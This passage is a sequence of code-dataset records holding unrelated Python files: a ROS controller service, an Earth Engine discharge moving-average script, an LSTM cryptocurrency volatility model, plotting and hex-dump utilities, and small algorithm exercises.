ROS callback.\n\n Parameters:\n msg -- The OccupancyGrid message data.\n \"\"\"\n\n # TODO: We do not set nav goals in this project.\n #if self.mapNavGoalMsg is None:\n # self.mapNavGoalMsg = msg\n\n def handle_map_nav_goal_msg(self):\n \"\"\" A handler for PoseStamped messages. This is called when a goal is provided,\n assigning the rewards for the MCC. This is a static method to work as a ROS callback.\n \"\"\"\n\n if self.mapNavGoalMsg is None:\n return\n msg = self.mapNavGoalMsg\n\n if self.mcc is None:\n rospy.logwarn(\"Warn[MCCExec.sub_map_nav_goal]: MCC has not yet been defined.\")\n return\n\n self.uninitialize_algorithm()\n self.initialize_algorithm()\n\n self.mapNavGoalMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def srv_get_action(self, req):\n \"\"\" This service returns an action based on the current FSC state, provided enough updates were done.\n\n Parameters:\n req -- The service request as part of GetAction.\n\n Returns:\n The service response as part of GetAction.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_get_action]: MCC or FSC state are undefined.\")\n return GetActionResponse(False, 0.0, 0.0, 0.0)\n\n # Randomly select an action following the stochastic FSC.\n action = self.fsc.get_action(self.fscState)\n\n rospy.loginfo(\"Info[MCCExec.srv_get_action]: Agent '%s' has selected action '%s'.\" % (self.agent, str(action)))\n\n # The relative goal is simply the relative location based on the \"grid-ize-ation\"\n # and resolution of the map. The goal theta is a bit harder to compute (estimate).\n goalX, goalY = action\n\n # TODO: Special: Flip the y axis...\n goalY = -goalY\n\n xSize = self.mapWidth / self.gridWidth\n ySize = self.mapHeight / self.gridHeight\n\n goalX *= xSize * self.mapResolution\n goalY *= ySize * self.mapResolution\n\n # If this is the first action we take, then we need to offset the goalX and goalY\n # as well as assign a goalTheta to properly setup the initial motion. Otherwise,\n # the adjustment required is simply 0; the path (action) follower will handle this.\n if not self.performedInitialPoseAdjustment:\n #goalX += self.initialPoseAdjustmentX\n #goalY += self.initialPoseAdjustmentY\n goalTheta = self.initialPoseAdjustmentTheta\n self.performedInitialPoseAdjustment = True\n else:\n goalTheta = 0.0\n\n return GetActionResponse(True, goalX, goalY, goalTheta)\n\n def srv_get_fsc_state(self, req):\n \"\"\" This service returns the current FSC state.\n\n Parameters:\n req -- The service request as part of GetFSCState.\n\n Returns:\n The service response as part of GetFSCState.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_get_fsc_state]: MCC or FSC state are undefined.\")\n return GetFSCStateResponse(\"\")\n\n # Print the FSC states for debug purposes.\n #rospy.loginfo(\"Info[MCCExec.srv_get_fsc_state]: Agent '%s' has FSC state '%s'.\" % (self.agent, self.fscState))\n\n return GetFSCStateResponse(str(self.fscState))\n\n def srv_update_fsc(self, req):\n \"\"\" This service updates the FSC based on a given action and observation.\n\n Parameters:\n req -- The service request as part of UpdateFSC.\n\n Returns:\n The service response as part of UpdateFSC.\n \"\"\"\n\n if self.mcc is None or self.fscState is None:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: MCC or FSC state are undefined.\")\n return UpdateFSCResponse(False)\n\n # Determine which action corresponds to this goal. Do the same for the observation.\n actionX = int(np.sign(req.goal_x) * float(abs(req.goal_x) > MCC_GOAL_THRESHOLD))\n actionY = int(np.sign(req.goal_y) * float(abs(req.goal_y) > MCC_GOAL_THRESHOLD))\n action = (actionX, actionY)\n\n try:\n actionIndex = self.mcc.action_factor.index(action)\n except ValueError:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: Invalid action given: [%i, %i].\" % (actionX, actionY))\n return UpdateFSCResponse(False)\n\n # Determine which observation corresponds to the request data.\n observation = req.bump_observed\n\n try:\n observationIndex = self.mcc.observation_factor.index(observation)\n except ValueError:\n rospy.logerr(\"Error[MCCExec.srv_update_fsc]: Invalid observation given: %s.\" % (str(req.bump_observed)))\n return UpdateFSCResponse(False)\n\n # Update the FSC state by randomly selecting a successor FSC state.\n self.fscState = self.fsc.get_successor(self.fscState, action, observation)\n\n rospy.loginfo(\"Info[MCCExec.srv_update_fsc]: Agent '%s' has selected successor FSC state '%s'.\" % (self.agent, str(self.fscState)))\n\n return UpdateFSCResponse(True)\n\n\n","repo_name":"kylewray/ccp","sub_path":"src/mcc/scripts/mcc_package/mcc_exec.py","file_name":"mcc_exec.py","file_ext":"py","file_size_in_byte":15544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9802565895","text":"\n# coding: utf-8\n\n# # Y2018M02D27_RH_Moving_Average_Discharge_EE_V01\n# \n# * Purpose of script: Moving average for discharge at basin resolution. The script will calculate the volumetric and flux 10 year moving average at a Pfaf6 basin level for total demand. (potentially also per sector demand)\n# \n# * Script exports to: \n# * Update this projects/WRI-Aquaduct/PCRGlobWB20V07/global_historical_PTotWW_month_m_pfaf06_1960_2014_movingaverage_10y_V01\n# * Update this projects/WRI-Aquaduct/PCRGlobWB20V07/global_historical_PTotWN_month_m_pfaf06_1960_2014_movingaverage_10y_V01\n# * Kernel used: python35\n# * Date created: 20170301\n# \n# The imageCollection global_historical_availableriverdischarge_month_millionm3_5minPfaf6_1960_2014 (output of script: Y2017M12D07_RH_ZonalStats_MaxQ_toImage_EE_V01) contains three bands: \n# \n# 1. zones_mode_pfaf6 \n# 1. sum. sum is the sum of the discharge in millionm3 at the q_search_mask (output of Y2017M12D06_RH_Conservative_Basin_Sinks_EE_V01). q_search_mask is FAmax-1 expect when endorheic or sinks\n# 1. max. global maximum of Q within basin. \n# \n# \n# \n# Methodology to apply. \n# \n# \n# if qmax < 1.25 qsum: \n# q = qmax \n# else: \n# q = qsum \n# \n# Can be optimized. Options include: Use flow accumulation instead of discharge\n# Use multiple level FAmax FAmax-1 FAmax-2 etc. \n# \n# \n# Known issues: \n# When the most downstream pixel is a lake, the blue water available of the lake is available to the entire sub-basin. For example pfaf_id 434210\n# \n# Sub-basins which have only one discharge cell of the main river: e.g. 142739 (Famale, Niger)\n# \n\n# In[1]:\n\nimport time, datetime, sys\ndateString = time.strftime(\"Y%YM%mD%d\")\ntimeString = time.strftime(\"UTC %H:%M\")\nstart = datetime.datetime.now()\nprint(dateString,timeString)\nsys.version\n\n\n# In[2]:\n\nSCRIPT_NAME = \"Y2018M02D27_RH_Moving_Average_Discharge_EE_V01\"\n\nCRS = \"EPSG:4326\"\n\nEE_PATH = \"projects/WRI-Aquaduct/PCRGlobWB20V07\"\n\nOUTPUT_VERSION = 2\n\nDIMENSION5MIN = {}\nDIMENSION5MIN[\"x\"] = 4320\nDIMENSION5MIN[\"y\"] = 2160\n\n\nMA_WINDOW_LENGTH = 10 # Moving average window length. \n\nTESTING = 0\n\nTHRESHOLD = 1.25\n\nPFAF_LEVEL = 6\n\nDIMENSIONS30SSMALL = \"43200x19440\"\nCRS_TRANSFORM30S_SMALL = [0.008333333333333333, 0.0, -180.0, 0.0, -0.008333333333333333, 81.0]\n\n\n# In[3]:\n\nimport ee\nimport os\nimport logging\nimport pandas as pd\nimport subprocess\n\n\n# In[4]:\n\nee.Initialize()\n\n\n# In[5]:\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')\nfile_handler = logging.FileHandler(\"./logs/%sV%0.2d.log\" %(SCRIPT_NAME,OUTPUT_VERSION))\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# In[6]:\n\ngeometry = ee.Geometry.Polygon(coords=[[-180.0, -90.0], [180, -90.0], [180, 90], [-180,90]], proj= ee.Projection('EPSG:4326'),geodesic=False )\n\n\n# In[7]:\n\ngeometrySmall = ee.Geometry.Polygon(coords=[[-180.0, -81.0], [180, -81.0], [180, 81], [-180,81]], proj= ee.Projection('EPSG:4326'),geodesic=False )\n\n\n# In[8]:\n\narea30s = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/area_30s_m2V11\")\nzones30s = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/hybas_lev00_v1c_merged_fiona_30s_V01\")\nzones30s = zones30s.divide(ee.Number(10).pow(ee.Number(12).subtract(PFAF_LEVEL))).floor().toInt64();\n\ncrs30s = area30s.projection()\n\narea30s_pfaf06 = ee.Image(\"projects/WRI-Aquaduct/PCRGlobWB20V07/area_30spfaf06_m2_V01V01\").select([\"sum\"])\n\nscale30s = zones30s.projection().nominalScale().getInfo()\n\n\n# In[9]:\n\n\"\"\"\ncrsTransform5min = [\n 0.0833333309780367,\n 0,\n -179.99999491255934,\n 0,\n -0.0833333309780367,\n 90.00000254430942\n ]\n\"\"\"\n\n\n# In[10]:\n\ndef prepare_discharge_collection(image):\n \"\"\" find the available discharge based on max and sum bands of available discharge\n \n if qmax =< threshold (1.25) qsum:\n q = qmax\n else:\n q = qsum\n \n Args:\n i_in (ee.Image) :image of available discharge with three bands: zones, max and sum\n \n Returns:\n i_q_out (ee.Image) : image with only one band 'b1'\n \n \n \"\"\"\n\n\n i_q_max = image.select([\"max\"]) \n i_q_sum = image.select([\"sum\"])\n \n i_ratio_q = i_q_max.divide(i_q_sum)\n \n use_max = i_ratio_q.lte(THRESHOLD)\n use_sum = i_ratio_q.gt(THRESHOLD)\n \n i_q_out = use_max.multiply(i_q_max).add((use_sum.multiply(i_q_sum)))\n i_q_out = i_q_out.select([\"max\"],[\"b1\"]) \n i_q_out = i_q_out.copyProperties(image) \n \n return i_q_out\n\n\n\ndef create_collection(assetid):\n \"\"\" Create image collection in earth engine asset folder\n \n This function will only work if the folder in which the\n new imageCollection will be created is valid\n \n \n Args:\n assetid (string) : asset id for the new image collection\n \n Returns: \n result (string) : captured message from command line\n \n \"\"\" \n \n command = \"earthengine create collection {}\".format(assetid) \n result = subprocess.check_output(command,shell=True)\n if result:\n logger.error(result)\n return result \n\n\ndef moving_average_decade(year,ic):\n \"\"\" Calculate a 10 year moving average\n \n This function is limited to one input paramater to allow mapping over a simple list. \n Averages the 10 year up to the input year. (]\n \n Global variables required include an imageCollection with a year property.\n \n \n Args:\n year (integer) : final year of interest.\n ic (ee.ImageCollection) : input imageCollection\n \n Returns: \n image (ee.Image) : earth engine image with the mean of the last 10 years\n \"\"\"\n \n min_year = year - MA_WINDOW_LENGTH\n \n ic_filtered = (ic.filter(ee.Filter.gt(\"year\",min_year))\n .filter(ee.Filter.lte(\"year\",year)))\n \n i_mean = ic_filtered.reduce(ee.Reducer.mean()) \n \n \n i_mean = i_mean.copyProperties(source=ic_filtered.first(),\n exclude=[\"script_used\",\n \"output_version\",\n \"year\",\n \"output_version\",\n \"version\",\n \"reducer\",\n \"description\"])\n \n return ee.Image(i_mean)\n\n\ndef mapList(results, key):\n newResult = results.map(lambda x: ee.Dictionary(x).get(key))\n return newResult\n\ndef ensure_default_properties(obj): \n obj = ee.Dictionary(obj)\n default_properties = ee.Dictionary({\"mean\": -9999,\"count\": -9999})\n return default_properties.combine(obj)\n\n\ndef zonal_stats_to_raster(image,zonesImage,geometry,maxPixels,reducerType,scale):\n \"\"\" Zonal statistics using rasterized zones\n \n Args:\n image (ee.Image) : input image with values (Check the units)\n zonesImage (ee.Image) : integer image with the zones\n geometry (ee.Geometry) : geometry indicating the extent of the calculation. Note if geometry is geodesic\n maxPixels (integer) : maximum numbers of pixels within geometry\n reducerType (string) : options include 'mean', 'max', 'sum', 'first' en 'mode' \n \n \n \n # reducertype can be mean, max, sum, first. Count is always included for QA\n # the resolution of the zonesimage is used for scale\n \"\"\"\n \n reducer = ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"mean\"),ee.Reducer.mean(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"max\"),ee.Reducer.max(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"sum\"),ee.Reducer.sum(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"first\"),ee.Reducer.first(),\n ee.Algorithms.If(ee.Algorithms.IsEqual(reducerType,\"mode\"),ee.Reducer.mode(),\"error\"))))\n )\n reducer = ee.Reducer(reducer).combine(reducer2= ee.Reducer.count(), sharedInputs= True).group(groupField=1, groupName=\"zones\") \n\n \n zonesImage = zonesImage.select(zonesImage.bandNames(),[\"zones\"])\n\n totalImage = ee.Image(image).addBands(zonesImage)\n resultsList = ee.List(totalImage.reduceRegion(\n geometry= geometry, \n reducer= reducer,\n scale= scale,\n maxPixels=maxPixels,\n bestEffort =True\n ).get(\"groups\"))\n\n resultsList = resultsList.map(ensure_default_properties); \n zoneList = mapList(resultsList, 'zones');\n countList = mapList(resultsList, 'count');\n valueList = mapList(resultsList, reducerType);\n\n valueImage = zonesImage.remap(zoneList, valueList).select([\"remapped\"],[reducerType])\n countImage = zonesImage.remap(zoneList, countList).select([\"remapped\"],[\"count\"])\n newImage = zonesImage.addBands(countImage).addBands(valueImage)\n return newImage\n\n\ndef set_properties(image):\n \"\"\" Set properties to image based on rows in pandas dataframe\n \n Args:\n image (ee.Image) : image without properties\n \n Returns:\n image_out (ee.Image) : image with properties\n \"\"\"\n \n properties ={}\n properties[\"year\"] = row[\"year\"]\n properties[\"month\"] = row[\"month\"]\n properties[\"units\"] = \"millionm3\"\n properties[\"moving_average_length\"] = MA_WINDOW_LENGTH\n properties[\"moving_average_year_min\"] = row[\"year\"]- (MA_WINDOW_LENGTH-1)\n properties[\"script_used\"] = SCRIPT_NAME\n properties[\"indicator\"] = row[\"indicator\"]\n properties[\"version\"] = OUTPUT_VERSION\n properties[\"spatial_resolution\"] = \"30s\"\n properties[\"exportdescription\"] = row[\"exportdescription\"]\n \n image_out = ee.Image(image).set(properties)\n return image_out\n\n\ndef export_asset(image):\n \"\"\" Export a google earth engine image to an asset folder\n \n function will start a new task. To view the status of the task\n check the javascript API or query tasks script. Function is used \n as mapped function so other arguments need to be set globally. \n \n Args:\n image (ee.Image) : Image to export\n \n Returns:\n asset_id (string) : asset id of \n \"\"\"\n \n asset_id = row[\"output_i_assetid\"]\n task = ee.batch.Export.image.toAsset(\n image = ee.Image(image),\n description = \"{}V{}\".format(row[\"exportdescription\"],OUTPUT_VERSION),\n assetId = asset_id,\n dimensions = DIMENSIONS30SSMALL,\n crs = CRS,\n crsTransform = CRS_TRANSFORM30S_SMALL,\n maxPixels = 1e10 \n )\n task.start()\n return asset_id\n\n\n\n\n# In[11]:\n\narea30sPfaf6 = zonal_stats_to_raster(area30s,zones30s,geometrySmall,1e10,\"sum\",scale30s)\n\n\n# In[12]:\n\narea30sPfaf6_m2 = area30sPfaf6.select([\"sum\"]) # image at 30s with area in m^2 per basin\n\n\n# In[13]:\n\nmonths = range(1,13)\nyears = range(1960+9,2014+1)\nindicators = [\"availabledischarge\"]\n\n\n# In[14]:\n\ndf = pd.DataFrame()\nfor indicator in indicators:\n for month in months:\n for year in years:\n newRow = {}\n newRow[\"month\"] = month\n newRow[\"year\"] = year\n newRow[\"output_ic_filename\"] = \"global_historical_{}_month_millionm3_pfaf06_1960_2014_movingaverage_10y_V{:02.0f}\".format(indicator,OUTPUT_VERSION)\n newRow[\"output_ic_assetid\"] = \"{}/{}\".format(EE_PATH,newRow[\"output_ic_filename\"])\n newRow[\"output_i_filename\"] = \"global_historical_{}_month_millionm3_pfaf06_Y{:04.0f}M{:02.0f}_movingaverage_10y_V{:02.0f}\".format(indicator,year,month,OUTPUT_VERSION)\n newRow[\"output_i_assetid\"] = \"{}/{}\".format(newRow[\"output_ic_assetid\"],newRow[\"output_i_filename\"])\n newRow[\"indicator\"] = indicator\n newRow[\"exportdescription\"] = \"{}_month_Y{:04.0f}M{:02.0f}_movingaverage_10y\".format(indicator,year,month)\n df= df.append(newRow,ignore_index=True)\n\n\n# In[15]:\n\ndf.head()\n\n\n# In[16]:\n\nif TESTING:\n df = df[0:1]\n\n\n# In[17]:\n\ndf.shape\n\n\n# In[18]:\n\nfor output_ic_assetid in df[\"output_ic_assetid\"].unique():\n result = create_collection(output_ic_assetid)\n print(result)\n\n\n# In[19]:\n\nfunction_time_start = datetime.datetime.now()\nfor index, row in df.iterrows(): \n ic = ee.ImageCollection(\"{}/global_historical_availableriverdischarge_month_millionm3_5minPfaf6_1960_2014\".format(EE_PATH))\n ic_month = ic.filter(ee.Filter.eq(\"month\",row[\"month\"]))\n \n ic_month_simplified = ic_month.map(prepare_discharge_collection)\n i_mean = moving_average_decade(row[\"year\"],ic_month_simplified)\n \n # The result of this operation is at 5arc min. The withdrawal and demand data is at 30s though. Resampling to 30s using the \"mode\" aka majority\n i_mean_30s = zonal_stats_to_raster(i_mean,zones30s,geometrySmall,1e10,\"mode\",scale30s).select([\"mode\"])\n i_mean_30s = i_mean_30s.copyProperties(\n source = i_mean,\n exclude= [\"resolution\",\"spatial_resolution\"])\n i_mean_30s = set_properties(i_mean_30s)\n \n asset_id = export_asset(i_mean_30s)\n logger.info(asset_id)\n elapsed = datetime.datetime.now() - function_time_start\n print(\"Processing image {} month {} of year {} runtime {}\".format(index,row[\"month\"],row[\"year\"],elapsed))\n\n\n# In[20]:\n\nend = datetime.datetime.now()\nelapsed = end - start\nprint(elapsed)\n\n","repo_name":"wri/Aqueduct30Docker","sub_path":"notebooks/production/Y2018M02D27_RH_Moving_Average_Discharge_EE_V01.py","file_name":"Y2018M02D27_RH_Moving_Average_Discharge_EE_V01.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"1210498772","text":"def getSum(a: int, b: int) -> int:\n MASK = 0xFFFFFFFF\n INT_MASk = 0x7FFFFFFF\n\n while b != 0:\n a, b = (a ^ b) & MASK, ((a & b) << 1) & MASK\n\n if a > INT_MASk:\n a = ~(a ^ MASK)\n return a\nprint(getSum(1, 2))\n","repo_name":"angelatto/Algorithm","sub_path":"LeetCode/371.py","file_name":"371.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36811744864","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 3 16:31:23 2023\n\n@author: wangshuyou\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 10 20:10:19 2022\n\n@author: wangshuyou\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout, Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers import LSTM\nfrom sklearn.metrics import mean_squared_error\nimport time\nimport random\nimport warnings\nwarnings.filterwarnings('ignore')\n\nstart = time.time() # 開始測量\n\n# 載入訓練資料\ndf_eth = pd.read_excel(\"C:\\碩論資料\\eth.xlsx\",index_col='date')\ndf_eth = df_eth.sort_index()\n\ndf_eth['close_lag'] = df_eth['close'].shift(1)\ndf_eth['ln_clo'] = df_eth['close'].apply(np.log)\ndf_eth['ln_clo_lag'] = df_eth['close_lag'].apply(np.log)\ndf_eth['r'] = df_eth['ln_clo'] - df_eth['ln_clo_lag']\ndf_eth = df_eth.where(df_eth.notnull(),0)\n\n\n# train/test set 73分\ntrain = df_eth.loc[:'2021-04-27 23:55:00',:]\ntest = pd.concat([df_eth,train]).drop_duplicates(keep = False) \n\n# 實際波動度\ndef rv(x):\n return np.sqrt(np.sum(x**2))\nrv_all = df_eth['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\nrv_train = train['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\nrv_test = test['r'].groupby(pd.Grouper(freq = 'D')).apply(rv)\n\n# 1349筆資料預測下1期\nxx,y = [],[]\nfor i in range(1349,len(rv_all)):\n xx.append(rv_all.iloc[i-1349:i])\n y.append(rv_all.iloc[i])\nxx,y = np.array(xx),np.array(y) # array特性,行列相反\nxx = np.reshape(xx, (xx.shape[0],xx.shape[1],1)) #轉成3維,INDEX=0 是前1349個\n# 3維的意義:[樣本\\時間步\\功能]\n\n#Build the model\n# 共五層:3 hidden layers + 2 fully connected layers\nrandom.seed(0)\nmodel = Sequential()\n# 第1層layers\nmodel.add(LSTM(10,input_shape=(xx.shape[1],1),return_sequences=True))\nmodel.add(Dropout(0.3))# 捨棄率,防止overfitting \n# units = 神經元的數目 \n# 第2層layers\nmodel.add(LSTM(4, return_sequences=True))\nmodel.add(Dropout(0.8)) \n# 第3層layers\nmodel.add(LSTM(2, return_sequences=True))\nmodel.add(Dropout(0.8)) \nmodel.add(Dense(1))\nmodel.add(Flatten())\n# 第4層connected layer\nmodel.add(Dense(5))\n# 第5層connected layer\nmodel.add(Dense(1))\n\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(xx, y,epochs=150, batch_size = 1349,verbose=2)\n# verbose = 2 :為每個epochs輸出一行紀錄\n# epoch : 期,演算法完整使用150次資料集每筆資料的狀態\n\nXt = model.predict(xx)\nplt.plot(y,label = 'True') # 維度更改成1行1列: -1的功能是自動計算,C = 1, C/D(個數) = 576\nplt.plot(Xt,label = 'Predict')\nplt.xlabel('Days')\nplt.ylabel('Realized Volatility')\nplt.title('LSTM_RV_predict_1D')\nplt.legend()\nplt.show()\n\ny = y.reshape(-1,1)\ndef mae(y,yhat):\n mae = sum(abs(y-yhat))/len(y)\n return mae\n#MSE 可以評價資料的變化程度\ndef rmse(y, yhat):\n rmse = np.sqrt(sum(((y - yhat)*(y - yhat))))\n return rmse\n#MAPE:表示預測值和實際值之間的平均偏差為?%\ndef mape(y, yhat):\n mape = (y - yhat)/y\n mape[~np.isfinite(mape)] = 0 # 先計算除法,在處理除以0變成inf的問題\n mape = np.mean(np.abs(mape)) * 100\n return mape\n# =============================================================================\n\nprint('MAE:%3f ' % mae(y,Xt))\nprint('RMSE:%3f ' % rmse(y,Xt))\nprint('MAPE:%3f' % mape(y,Xt))\n\n\nend = time.time() # 結束測量\nprint(\"執行時間:%f 秒\" % (end - start))\n\n\n\n\n\n","repo_name":"WSY-Samuel/Master_thesis","sub_path":"LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1893451985","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndef load_led_data(path_led: str) -> pd.DataFrame:\n \"\"\"\n Load the LED activation data using pandas.\n \"\"\"\n return pd.read_csv(path_led, header=0) # Adjust header argument if needed\n\ndef get_first_led_frames(led_data: pd.DataFrame) -> np.array:\n \"\"\"\n Extract frame numbers of the first frame of each LED activation.\n \"\"\"\n # Identifying transitions from 0 to 4095 in the 'dp' column.\n activated_indices = np.where((led_data['dp'].shift() == 0) & (led_data['dp'] == 4095))[0]\n \n # Extracting the frame numbers at these indices.\n frames = led_data.loc[activated_indices, 'frame_nr'].to_numpy()\n \n return frames\n\ndef plot_led_activations(frames: np.array) -> None:\n \"\"\"\n Plot frame numbers of the first frame of each LED activation.\n \"\"\"\n plt.figure(figsize=(15, 10))\n plt.scatter(frames, [1]*len(frames), color='red') # plotting at y=1 for visibility, adjust as needed\n plt.title(\"LED Activations\")\n plt.xlabel(\"Frame Number\")\n plt.ylabel(\"LED Activation\")\n plt.yticks([]) # hide y axis ticks\n # plt.savefig(\"NAME_OF_PLOT_FILE.svg\") # Uncomment to save the plot as an SVG file \n plt.show()\n\nif __name__ == '__main__':\n path_led = r\"PATH_TO_TEH_LED_DATA_CSV\"\n led_data = load_led_data(path_led)\n first_frames = get_first_led_frames(led_data)\n plot_led_activations(first_frames)\n","repo_name":"SamuelZidaric/thesis","sub_path":"plotting_templates/local/loop_activation_led.py","file_name":"loop_activation_led.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36151777573","text":"from __future__ import print_function\nfrom __future__ import division\nimport six\nfrom six.moves import xrange\nimport struct\nfrom applog import *\nimport sys\nimport time\n\ndef hexByte(value):\n\treturn \"0x{:02x}\".format(value)\ndef hexShort(value):\n\treturn \"0x{:04x}\".format(value)\ndef hexWord(value):\n\treturn \"0x{:08x}\".format(value)\n\ndef hexByteFromData(data):\n\t(byte,)=struct.unpack('B',data[:1])\n\treturn hexByte(byte)\ndef hexShortFromData(data):\n\t(short,)=struct.unpack('H',data[:2])\n\treturn hexShort(short)\t\ndef hexWordFromData(data):\n\t(word,)=struct.unpack('I',data[:4])\n\treturn hexWord(word)\t\n\n#\n# inverts the endianness of a scalar (integer) value\n# \t\ndef invertEndian(scalar):\n\n\t# first convert scalar to a byte array\n\tbytesPacked = struct.pack('=Q', scalar)\n\t\n\t#\n\t# now unpack and invert endian by specifying struct.unpack()\n\t# endian that is opposite of the native endian for the platform\n\t# we're running on. I'm expecting all Python implementations\n\t# to do endian inversions by byte swapping, so this method should\n\t# be portable\n\t#\n\tif sys.byteorder == 'little':\n\t\t# on little-endian platform. invert endian by specifying big endian\n\t\t(value,) = struct.unpack('>Q', bytesPacked)\n\telse:\n\t\t# on big-endian platform. invert endian by specifying little endian\n\t\t(value,) = struct.unpack(': xx xx xx xx xx xx xx xx - xx xx xx xx xx xx xx xx yyyyyyyy - yyyyyyyy\n#\n# bytesPerField=2:\n#\n#\t: xxxx xxxx xxxx xxxx - xxxx xxxx xxxx xxx yyyyyyyy - yyyyyyyy\n#\n# bytesPerField=4:\n#\n#\t: xxxxxxxx xxxxxxxx - xxxxxxxx xxxxxxx yyyyyyyy - yyyyyyyy\n#\n# Where 'xx' are the hex values of each byte/halfword/word and 'y' is\n# the ASCII character equivalent ('.' for each non-printable ASCII value <32 or >127)\n#\ndef hexdump(data, bytesPerField=1, includeASCII=1):\n\tbytesPerFieldToUnpackStr = { 1 : 'B', 2 : 'H', 4 : 'I', 8 : 'Q' }\n\tstrHexDump=''\n\tif bytesPerField not in bytesPerFieldToUnpackStr:\n\t\tapplog_w(\"hexdump: bytesPerField invalid. must be 1, 2, 4, or 8\")\n\t\treturn strHexDump\n\tif (len(data) % bytesPerField) != 0:\n\t\tapplog_w(\"hexdump: size of data (0x{:04x}) is not a multiple of bytesPerField ({:d})\".format(len(data), bytesPerField))\n\t\treturn strHexDump\n\tfor offset in xrange(0,len(data),bytesPerField):\n\t\toffsetThisFieldInLine = (offset % 16)\t# byte offset into data for this field of current line\n\t\tendingOffsetThisFieldInLine = offsetThisFieldInLine + bytesPerField\t\t\n\t\tif (offsetThisFieldInLine == 0):\n\t\t\tstrHexDump += \"{:04x}: \".format(offset)\n\t\t(thisField,) = struct.unpack(bytesPerFieldToUnpackStr[bytesPerField], data[offset:offset+bytesPerField])\n\t\tstrHexDump += \"{:0{:d}x} \".format(thisField, bytesPerField*2)\t\t# (value,width) - width: bytes=2, halfwords=4, words=8\n\t\tif (endingOffsetThisFieldInLine == 8):\n\t\t\tstrHexDump += \"- \"\n\t\tif (endingOffsetThisFieldInLine == 16 or (offset==len(data)-1)):\n\t\t\t# just processed 16 bytes of line or have reached final byte\n\t\t\t# of buffer (partial last line). Add ASCII representation\n\t\t\t# of hex values on this line.\n\t\t\tbIsFinalLine = (offset == len(data)-1)\n\t\t\tif includeASCII:\n\t\t\t\tif (endingOffsetThisFieldInLine < 16):\n\t\t\t\t\t# final line is a partial line. pad with spaces to\n\t\t\t\t\t# fill out area that would normally contain hex\n\t\t\t\t\t# values before start ASCII dump seciton\n\t\t\t\t\tfieldsNotPrintedInFinalLine = (16-endingOffsetThisFieldInLine) * bytesPerField\n\t\t\t\t\tcharactersPerFieldIncludingSpace = bytesPerField*2 + 1\n\t\t\t\t\tstrHexDump += \" \" * (fieldsNotPrintedInFinalLine*charactersPerFieldIncludingSpace) # add spaces for each missing field\t\t\t\t\n\t\t\t\t\tif (endingOffsetThisFieldInLine < 8):\n\t\t\t\t\t\tstrHexDump += \" \"\t\t\t\t\t\t\t\t# add spaces for missing middle separator\n\t\t\t\tfor asciiOffset in range(offsetThisFieldInLine+1):\n\t\t\t\t\t(thisByte,) = struct.unpack('B', data[offset-offsetThisFieldInLine+asciiOffset:offset-offsetThisFieldInLine+asciiOffset+1])\n\t\t\t\t\tif (thisByte >= 32 and thisByte <= 127):\n\t\t\t\t\t\tstrHexDump += six.unichr(thisByte)\n\t\t\t\t\telse:\n\t\t\t\t\t\tstrHexDump += \".\"\n\t\t\t\t\tif (asciiOffset == 7):\n\t\t\t\t\t\tstrHexDump += \" - \"\n\t\t\tif not bIsFinalLine:\t# don't put newline after final line\n\t\t\t\tstrHexDump += \"\\n\"\n\treturn strHexDump\n\t\t\n","repo_name":"shezi/airmtp","sub_path":"strutil.py","file_name":"strutil.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"54"} +{"seq_id":"2491328752","text":"#User function Template for python3\nfrom enum import Enum\n\nclass Direction(Enum):\n LeftToRight = 0\n RightToLeft = 1\n\n'''\nclass Node:\n def init(self, val):\n self.right = None\n self.data = val\n self.left = None\n'''\n# your task is to complete this function\ndef findSpiral(root):\n answer = []\n if root == None:\n return answer\n\n direction = Direction.RightToLeft\n current_level = 0\n nodes = [[root]]\n must_visited = [root] \n\n while len(must_visited) > 0:\n nodes_to_explore = nodes[current_level]\n\n # print nodes\n add_to_answer(nodes_to_explore, direction, answer)\n # change direction\n direction = Direction.RightToLeft if direction == Direction.LeftToRight else Direction.LeftToRight\n\n current_level += 1\n must_visited.clear()\n for node in nodes_to_explore:\n if node.left != None:\n must_visited.append(node.left)\n if node.right != None:\n must_visited.append(node.right)\n\n if len(must_visited) > 0:\n nodes.append(must_visited.copy())\n\n return answer\n\n\ndef 